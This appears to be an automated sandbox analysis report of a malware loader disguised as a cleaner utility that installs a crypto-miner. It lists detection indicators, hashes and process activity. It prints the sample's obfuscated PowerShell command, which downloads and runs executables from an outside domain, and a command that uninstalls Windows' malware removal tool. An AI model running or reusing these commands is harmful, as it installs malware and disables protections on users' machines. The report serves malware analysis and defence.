File name:

_86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe

Full analysis: https://app.any.run/tasks/740c0dae-dc0d-4db1-bb2a-fc680d4d08b6
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 24, 2025, 15:05:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
loader
miner
pastebin
silentcryptominer
winring0-sys
vuln-driver
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 4 sections
MD5:

FAFB03A25C7988CBCACBFCB786891C9E

SHA1:

4837D8EACE46157567FE962F36D1FA6E4AAE8E19

SHA256:

86A0497B6B95420D558CC3A6CBAA79F4D599474EDF8910ECBCA7802888464201

SSDEEP:

98304:Hb1814ZSRdZgVWpByBj8drJiQpWMU7kDfT1SK5Yynn8Tm8ujdYJS+dkcQC84panx:MCkzF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • PowerShell executes remote file download (POWERSHELL)

      • powershell.exe (PID: 7984)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 7832)

    • Executing a file with an untrusted certificate

      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)

    • Changes Windows Defender settings

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • Adds extension to the Windows Defender exclusion list

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • Uninstalls Malicious Software Removal Tool (MRT)

      • cmd.exe (PID: 7016)
      • cmd.exe (PID: 4804)

    • Vulnerable driver has been detected

      • gtbcekieflhl.exe (PID: 6416)

    • MINER has been detected (SURICATA)

      • svchost.exe (PID: 2276)

  • SUSPICIOUS

    • Reads the date of Windows installation

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • ycc.exe (PID: 7924)
      • yc.exe (PID: 7860)

    • Drops 7-zip archiver for unpacking

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)

    • Starts CMD.EXE for commands execution

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • Executing commands from a ".bat" file

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)

    • Executable content was dropped or overwritten

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • cmd.exe (PID: 7536)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • powershell.exe (PID: 7984)
      • WindowsUpdater.exe (PID: 7376)
      • cmd.exe (PID: 7512)
      • 7z.exe (PID: 7768)
      • WindowsUpdater.exe (PID: 6680)
      • 7z.exe (PID: 7668)
      • WindowsUpdater.exe (PID: 7700)
      • 7z.exe (PID: 7232)
      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • The executable file from the user directory is run by the CMD process

      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7768)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7744)
      • Installer.exe (PID: 7820)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7656)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 7668)
      • Installer.exe (PID: 7760)
      • 7z.exe (PID: 7664)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 2724)
      • 7z.exe (PID: 7228)
      • Installer.exe (PID: 7660)

    • Reads security settings of Internet Explorer

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • yc.exe (PID: 7860)
      • ycc.exe (PID: 7924)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsDefender.exe (PID: 6252)
      • ycc.exe (PID: 476)
      • yc.exe (PID: 8184)
      • ycc.exe (PID: 7724)
      • yc.exe (PID: 7652)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7536)
      • cmd.exe (PID: 7512)
      • cmd.exe (PID: 1844)
      • cmd.exe (PID: 1364)

    • Starts POWERSHELL.EXE for commands execution

      • ycc.exe (PID: 7924)
      • Installer.exe (PID: 7820)
      • ycc.exe (PID: 476)
      • ycc.exe (PID: 7724)
      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • Base64-obfuscated command line is found

      • ycc.exe (PID: 7924)
      • ycc.exe (PID: 476)
      • ycc.exe (PID: 7724)

    • BASE64 encoded PowerShell command has been detected

      • ycc.exe (PID: 7924)
      • ycc.exe (PID: 476)
      • ycc.exe (PID: 7724)

    • Executes application which crashes

      • ycorig.exe (PID: 7904)
      • ycorig.exe (PID: 7908)
      • ycorig.exe (PID: 7688)

    • There is functionality for taking screenshot (YARA)

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)

    • Starts process via Powershell

      • powershell.exe (PID: 7812)

    • Connects to unusual port

      • WindowsDefender.exe (PID: 6252)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)

    • Script adds exclusion path to Windows Defender

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • Manipulates environment variables

      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7788)

    • Script adds exclusion extension to Windows Defender

      • Installer.exe (PID: 2620)
      • gtbcekieflhl.exe (PID: 6416)

    • Windows service management via SC.EXE

      • sc.exe (PID: 5760)
      • sc.exe (PID: 7724)

    • Starts SC.EXE for service management

      • Installer.exe (PID: 2620)

    • Creates a new Windows service

      • sc.exe (PID: 7676)

    • Stops a currently running service

      • sc.exe (PID: 7848)

    • Non windows owned service launched

      • gtbcekieflhl.exe (PID: 6416)

    • Process uninstalls Windows update

      • wusa.exe (PID: 7664)
      • wusa.exe (PID: 1372)

    • Drops a system driver (possible attempt to evade defenses)

      • gtbcekieflhl.exe (PID: 6416)

    • Executes as Windows Service

      • gtbcekieflhl.exe (PID: 6416)

    • Crypto Currency Mining Activity Detected

      • svchost.exe (PID: 2276)

  • INFO

    • The sample compiled with english language support

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • WindowsUpdater.exe (PID: 7376)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)

    • Create files in a temporary directory

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • WindowsUpdater.exe (PID: 7376)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7768)
      • 7z.exe (PID: 7744)
      • yc.exe (PID: 8184)
      • yc.exe (PID: 7652)
      • WindowsUpdater.exe (PID: 6680)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 7656)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 7664)
      • WindowsUpdater.exe (PID: 7700)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 2724)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 7228)

    • Checks supported languages

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • mode.com (PID: 7596)
      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • ycc.exe (PID: 7924)
      • ycorig.exe (PID: 7904)
      • WindowsDefender.exe (PID: 6252)
      • WindowsUpdater.exe (PID: 7376)
      • mode.com (PID: 7624)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7744)
      • 7z.exe (PID: 7768)
      • Installer.exe (PID: 7820)
      • Installer.exe (PID: 2620)
      • yc.exe (PID: 8184)
      • ycc.exe (PID: 476)
      • Installer.exe (PID: 7460)
      • ycorig.exe (PID: 7908)
      • yc.exe (PID: 7652)
      • ycorig.exe (PID: 7688)
      • ycc.exe (PID: 7724)
      • WindowsDefender.exe (PID: 5720)
      • WindowsUpdater.exe (PID: 6680)
      • mode.com (PID: 5228)
      • Installer.exe (PID: 7176)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 7656)
      • Installer.exe (PID: 7760)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7664)
      • WindowsUpdater.exe (PID: 7700)
      • WindowsDefender.exe (PID: 7956)
      • mode.com (PID: 2576)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 2724)
      • 7z.exe (PID: 7228)
      • Installer.exe (PID: 7660)
      • gtbcekieflhl.exe (PID: 6416)

    • Reads the computer name

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • 7z.exe (PID: 7620)
      • 7z.exe (PID: 7644)
      • 7z.exe (PID: 7692)
      • 7z.exe (PID: 7716)
      • 7z.exe (PID: 7740)
      • 7z.exe (PID: 7764)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7788)
      • 7z.exe (PID: 7812)
      • yc.exe (PID: 7860)
      • ycorig.exe (PID: 7904)
      • ycc.exe (PID: 7924)
      • WindowsUpdater.exe (PID: 7376)
      • 7z.exe (PID: 7648)
      • 7z.exe (PID: 7672)
      • 7z.exe (PID: 7696)
      • 7z.exe (PID: 7720)
      • 7z.exe (PID: 7744)
      • WindowsDefender.exe (PID: 6252)
      • 7z.exe (PID: 7768)
      • ycc.exe (PID: 476)
      • yc.exe (PID: 8184)
      • ycorig.exe (PID: 7908)
      • ycorig.exe (PID: 7688)
      • ycc.exe (PID: 7724)
      • yc.exe (PID: 7652)
      • WindowsUpdater.exe (PID: 6680)
      • 7z.exe (PID: 4164)
      • 7z.exe (PID: 2308)
      • 7z.exe (PID: 7656)
      • 7z.exe (PID: 7592)
      • 7z.exe (PID: 7668)
      • 7z.exe (PID: 7664)
      • WindowsUpdater.exe (PID: 7700)
      • 7z.exe (PID: 6908)
      • 7z.exe (PID: 4884)
      • 7z.exe (PID: 7228)
      • 7z.exe (PID: 7232)
      • 7z.exe (PID: 7196)
      • 7z.exe (PID: 2724)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)

    • Process checks computer location settings

      • _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe (PID: 7464)
      • ycc.exe (PID: 7924)
      • yc.exe (PID: 7860)
      • WindowsUpdater.exe (PID: 7376)
      • ycc.exe (PID: 476)
      • yc.exe (PID: 8184)
      • yc.exe (PID: 7652)
      • ycc.exe (PID: 7724)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsUpdater.exe (PID: 7700)

    • Starts MODE.COM to configure console settings

      • mode.com (PID: 7596)
      • mode.com (PID: 7624)
      • mode.com (PID: 5228)
      • mode.com (PID: 2576)

    • Disables trace logs

      • powershell.exe (PID: 7984)

    • Reads the machine GUID from the registry

      • ycorig.exe (PID: 7904)
      • ycorig.exe (PID: 7908)
      • ycorig.exe (PID: 7688)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 8176)
      • WerFault.exe (PID: 1136)
      • WerFault.exe (PID: 7828)

    • Checks proxy server information

      • WerFault.exe (PID: 8176)
      • powershell.exe (PID: 7984)
      • WindowsDefender.exe (PID: 6252)
      • WerFault.exe (PID: 1136)
      • WerFault.exe (PID: 7828)
      • WindowsDefender.exe (PID: 5720)
      • WindowsDefender.exe (PID: 7956)
      • slui.exe (PID: 2724)

    • The executable file from the user directory is run by the Powershell process

      • WindowsUpdater.exe (PID: 7376)
      • WindowsDefender.exe (PID: 6252)
      • Installer.exe (PID: 2620)
      • WindowsDefender.exe (PID: 5720)
      • WindowsUpdater.exe (PID: 6680)
      • WindowsDefender.exe (PID: 7956)
      • WindowsUpdater.exe (PID: 7700)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 592)
      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7788)

    • Creates files in the program directory

      • Installer.exe (PID: 2620)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7788)

    • The sample compiled with japanese language support

      • gtbcekieflhl.exe (PID: 6416)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2012:05:28 09:05:18+00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 8
CodeSize: 102400
InitializedDataSize: 38400
UninitializedDataSize: -
EntryPoint: 0x1945f
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.3.2.5
ProductVersionNumber: 1.3.2.5
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
LegalCopyright: Copyright © 2025
OriginalFileName: YC.exe
FileVersion: 1.3.2.5
ProductName: YCleanner
ProductVersion: 1.3.2.5
InternalName: YC.exe
FileDescription: YCleanner
Created: 7z SFX Constructor v4.6.0.0 (http://usbtor.ru/viewtopic.php?t=798)
Builder: ahileeeeeess 15:17:48 24/11/2025
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
257
Monitored processes
110
Malicious processes
16
Suspicious processes
7

Behavior graph

Click at the process to see the details
start _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe cmd.exe conhost.exe no specs mode.com no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe attrib.exe no specs yc.exe ycorig.exe ycc.exe no specs powershell.exe conhost.exe no specs werfault.exe windowsdefender.exe windowsupdater.exe cmd.exe conhost.exe no specs mode.com no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe attrib.exe no specs installer.exe no specs powershell.exe no specs conhost.exe no specs winrar.exe no specs installer.exe winrar.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs yc.exe no specs ycorig.exe ycc.exe no specs powershell.exe no specs werfault.exe conhost.exe no specs installer.exe no specs yc.exe no specs ycorig.exe ycc.exe no specs werfault.exe powershell.exe no specs conhost.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs installer.exe no specs winrar.exe no specs windowsdefender.exe windowsupdater.exe cmd.exe no specs conhost.exe no specs mode.com no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe attrib.exe no specs installer.exe no specs powershell.exe no specs conhost.exe no specs windowsdefender.exe windowsupdater.exe cmd.exe no specs conhost.exe no specs mode.com no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe no specs 7z.exe attrib.exe no specs installer.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs wusa.exe no specs sc.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs THREAT gtbcekieflhl.exe powershell.exe no specs conhost.exe no specs slui.exe cmd.exe no specs conhost.exe no specs conhost.exe no specs explorer.exe wusa.exe no specs #MINER svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
476"C:\Users\admin\AppData\Local\Temp\ycc.exe" C:\Users\admin\AppData\Local\Temp\ycc.exeyc.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\ycc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shell32.dll
592"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYwBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcALAAgADwAIwBmAHoAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAagBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeABxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAGQAaQB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwBXAGkAbgBkAG8AdwBzAFUAcABkAGEAdABlAHIALgBlAHgAZQAnACwAIAA8ACMAawB5AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGcAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHkAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFUAcABkAGEAdABlAHIALgBlAHgAZQAnACkAKQA8ACMAcwBuAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBwAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAcgB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAC4AZQB4AGUAJwApADwAIwB1AHgAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQByAC4AZQB4AGUAJwApADwAIwBqAGcAdQAjAD4A"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeycc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
1036"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\file_4.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1136C:\WINDOWS\system32\WerFault.exe -u -p 7908 -s 960C:\Windows\System32\WerFault.exe
ycorig.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\oleaut32.dll
1364C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\main\main.bat" /S"C:\Windows\System32\cmd.exeWindowsUpdater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1372wusa /uninstall /kb:890830 /quiet /norestartC:\Windows\System32\wusa.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Update Standalone Installer
Exit code:
87
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wusa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\gdi32.dll
1844C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\main\main.bat" /S"C:\Windows\System32\cmd.exeWindowsUpdater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2276C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
23087z.exe e extracted/file_5.zip -oextractedC:\Users\admin\AppData\Local\Temp\main\7z.execmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
MEDIUM
Description:
7-Zip Console
Exit code:
0
Version:
19.00
Modules
Images
c:\users\admin\appdata\local\temp\main\7z.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
2576mode 65,10C:\Windows\System32\mode.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
DOS Device MODE Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mode.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\ureg.dll
c:\windows\system32\msvcp_win.dll
Total events
83 480
Read events
83 349
Write events
131
Delete events
0

Modification events

(PID) Process:(7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(7464) _86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(7860) yc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(7860) yc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(7860) yc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
